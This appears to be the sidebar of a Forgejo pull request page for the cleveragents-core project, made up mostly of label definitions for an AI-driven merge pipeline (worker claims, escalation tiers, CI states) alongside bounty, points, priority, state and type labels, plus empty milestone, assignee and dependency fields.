PR blocked by an open issue dependency. Operator must close the dep (or remove the dependency link) before the merge driver can act. Auto-cleared by merge_drive when no open deps remain.

  
auto/ci-timeout
Most recent merge cycle hit CI timeout. Driver excludes this PR while last merge_cycle row is < 30 min old; label persists thereafter as visible history.

  
auto/claimed-implementer
Currently being processed by an implementer worker.

  
auto/claimed-merge
Currently being processed by the merge driver.

  
auto/claimed-reviewer
Currently being processed by a reviewer worker.

  
auto/driver-down
Merge driver heartbeat stale; pipeline halted. Closed automatically on next clean tick.

  
auto/invariant-violation
Detected master commit violating the strict merge invariant. Tracked as an issue (not a PR label); kept here for label completeness.

  
auto/last-attempt-tier-0
In-cycle escalation: most recent attempt ran at the Tier 0 slot (`tier-0`). Slot's model defined in .opencode/models/tiers.yaml.

  
auto/last-attempt-tier-1
In-cycle escalation: most recent attempt ran at the Tier 1 slot (`tier-1`). Slot's model defined in .opencode/models/tiers.yaml.

  
auto/last-attempt-tier-2
In-cycle escalation: most recent attempt ran at the Tier 2 slot (`tier-2`). Slot's model defined in .opencode/models/tiers.yaml. Gated behind IMPLEMENTER_ESCALATION_TIER2_ENABLED.

  
auto/last-attempt-tier-min
In-cycle escalation: most recent attempt ran at the Tier -1 slot (`tier-min`). Slot's model defined in .opencode/models/tiers.yaml. Suffix is ``-min`` (not ``--1``) so the Forgejo UI reads naturally.

  
Automation Tracking
Tracking issues used by the AI Automation system for agents to communicate and report.

  
auto/needs-conflict-resolution
Rebase conflict needs LLM conflict-resolver.

  
auto/needs-implementer
Failing CI needs implementer attention.

  
auto/postmortem
Documenting a driver incident or rollback.

  
auto/ready-to-merge
Reviewer has APPROVED this PR and no later REQUEST_CHANGES is outstanding. The merge driver requires this label to even consider a PR for merging. Set by the reviewer worker on APPROVE; cleared on REQUEST_CHANGES.

  
auto/restart-throttled
Train repeatedly lost master-tempo races. Driver excludes via merge_cycle until cooldown elapses; label persists as visible history.

  
auto/revert
Revert PR backing out an invariant violation. Fast-tracked through the merge driver.

  
auto/sentinel
Sentinel PR duplicated from upstream into a personal fork by tools/duplicate_prs_to_fork.py for pipeline testing. Lives only in the fork; the canonical pipeline never sees it.

  
auto/stale-inactivity
No implementer activity for N days. Flagged for human review. Auto-cleared on next push to head branch.

  
auto/unstable
Repeatedly fails on current master (>= 3 ci-fail-on-rebased-sha releases in 12 h). Excluded from driver until human triage.

  
Blocked
A ticket in a blocked state and unable to complete until some other task is completed first.

  
Bounty
$100
 A bounty of $100 for any open-source contributor who provides a MR that solves this issue

  
Bounty
$1000
 A bounty of $1000 for any open-source contributor who provides a MR that solves this issue

  
Bounty
$10000
 A bounty of $10000 for any open-source contributor who provides a MR that solves this issue

  
Bounty
$20
 A bounty of $20 for any open-source contributor who provides a MR that solves this issue

  
Bounty
$2000
 A bounty of $2000 for any open-source contributor who provides a MR that solves this issue

  
Bounty
$250
 A bounty of $250 for any open-source contributor who provides a MR that solves this issue

  
Bounty
$50
 A bounty of $50 for any open-source contributor who provides a MR that solves this issue

  
Bounty
$500
 A bounty of $500 for any open-source contributor who provides a MR that solves this issue

  
Bounty
$5000
 A bounty of $5000 for any open-source contributor who provides a MR that solves this issue

  
Bounty
$750
 A bounty of $750 for any open-source contributor who provides a MR that solves this issue

  
MoSCoW
Could have
 Could have feature in order to satisfy the epic/legendary.

  
MoSCoW
Must have
 Must have feature in order to satisfy the epic/legendary.

  
MoSCoW
Should have
 Should have feature in order to satisfy the epic/legendary.

  
Needs Feedback
There are questions in the ticket that can not be completed until the project owner provides clarity.

  
Points
1
 1 man-hours worth of work for an expert with no learning curve.

  
Points
13
 13 man-hours worth of work for an expert with no learning curve.

  
Points
2
 2 man-hours worth of work for an expert with no learning curve.

  
Points
21
 21 man-hours worth of work for an expert with no learning curve.

  
Points
3
 3 man-hours worth of work for an expert with no learning curve.

  
Points
34
 34 man-hours worth of work for an expert with no learning curve.

  
Points
5
 5 man-hours worth of work for an expert with no learning curve.

  
Points
55
 55 man-hours worth of work for an expert with no learning curve.

  
Points
8
 8 man-hours worth of work for an expert with no learning curve.

  
Points
88
 88 man-hours worth of work for an expert with no learning curve.

  
Priority
Backlog
 This ticket has backlogged priority and is not to be worked on yet

  
Priority
CI Blocker
 Critical priority issue that blocks CI/CD pipeline and prevents PR merges

  
Priority
Critical
 The priority is critical

  
Priority
High
 The priority is high

  
Priority
Low
 The priority is low

  
Priority
Medium
 The priority is medium

  
Signed-off: Owner
When an epic or legendary is in review it must be signed off by owner, tech lead, and scrum master before being marked as completed.

  
Signed-off: Scrum Master
When an epic or legendary is in review it must be signed off by owner, tech lead, and scrum master before being marked as completed.

  
Signed-off: Tech Lead
When an epic or legendary is in review it must be signed off by owner, tech lead, and scrum master before being marked as completed.

  
Spike
A ticket for learning a tool or technology that is needed to be able to do future planning and design.

  
State
Completed
 The ticket has been fully implemented, completed, and merged with the source code. This label should only be applied once a ticket is closed.

  
State
Duplicate
 A ticket that represents the same content as an existing ticket.

  
State
In Progress
 A ticket that is actively being developed.

  
State
In Review
 A ticket that has had some code completed to implement but is waiting to pass peer review and is not yet merged in.

  
State
Paused
 This ticket's work started but wasn't finished. It's on hold (likely in a feature branch) and will be resumed later, either due to a blocker or a delay.

  
State
Unverified
 All new tickets start in this state. A developer may set it to show the ticket is unverified. This means we haven't agreed to work on it. It will either move to a verified state or be closed as wontdo.

  
State
Verified
 The issue has been verified by a developer as legitimate. It will be worked on and verified tickets are now considered part of the backlog.

  
State
Wont Do
 This ticket has been decided it wont be done. This may mean the bug has been determined to not be real (cant verify) or the feature is one we have decided we dont want to adopt.

  
Type
Automation
 Any edits or discussion about the AI automated coding system.

  
Type
Bug
 Something that doesnt work as intended.

  
Type
Discussion
 Anytime a ticket represents a discussion about a subject and doesnt fall into one of the other categories.

  
Type
Documentation
 An error or improvement needed in the documentation.

  
Type
Epic
 Any first tier epic. That is, an epic which contains only issues as children and will not have sub-epics.

  
Type
Feature
 Some new functionality not present.

  
Type
Legendary
 A type of Epic which will contain other Epics.

  
Type
Refactor
 A code change that restructures existing code without changing its external behavior.

  
Type
Support
 Someone needs help using the project.

  
Type
Task
 A generic task that doesnt fit into the other type categories.

  
Type
Testing
 Work exclusively focusing on fixing or expanding testing.

No labels
auto/needs-reevaluation
controller-managed
auto/blocked-by-deps
auto/ci-timeout
auto/claimed-implementer
auto/claimed-merge
auto/claimed-reviewer
auto/driver-down
auto/invariant-violation
auto/last-attempt-tier-0
auto/last-attempt-tier-1
auto/last-attempt-tier-2
auto/last-attempt-tier-min
Automation Tracking
auto/needs-conflict-resolution
auto/needs-implementer
auto/postmortem
auto/ready-to-merge
auto/restart-throttled
auto/revert
auto/sentinel
auto/stale-inactivity
auto/unstable
Blocked
Bounty
$100
Bounty
$1000
Bounty
$10000
Bounty
$20
Bounty
$2000
Bounty
$250
Bounty
$50
Bounty
$500
Bounty
$5000
Bounty
$750
MoSCoW
Could have
MoSCoW
Must have
MoSCoW
Should have
Needs Feedback
Points
1
Points
13
Points
2
Points
21
Points
3
Points
34
Points
5
Points
55
Points
8
Points
88
Priority
Backlog
Priority
CI Blocker
Priority
Critical
Priority
High
Priority
Low
Priority
Medium
Signed-off: Owner
Signed-off: Scrum Master
Signed-off: Tech Lead
Spike
State
Completed
State
Duplicate
State
In Progress
State
In Review
State
Paused
State
Unverified
State
Verified
State
Wont Do
Type
Automation
Type
Bug
Type
Discussion
Type
Documentation
Type
Epic
Type
Feature
Type
Legendary
Type
Refactor
Type
Support
Type
Task
Type
Testing
Milestone
Clear milestone
No items
No milestone
v3.7.0
Projects
Clear projects
No items
No project
Assignees
Clear assignees
No assignees
2 participants
Notifications
Due date
The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference
cleveragents/cleveragents-core!10890
No description provided.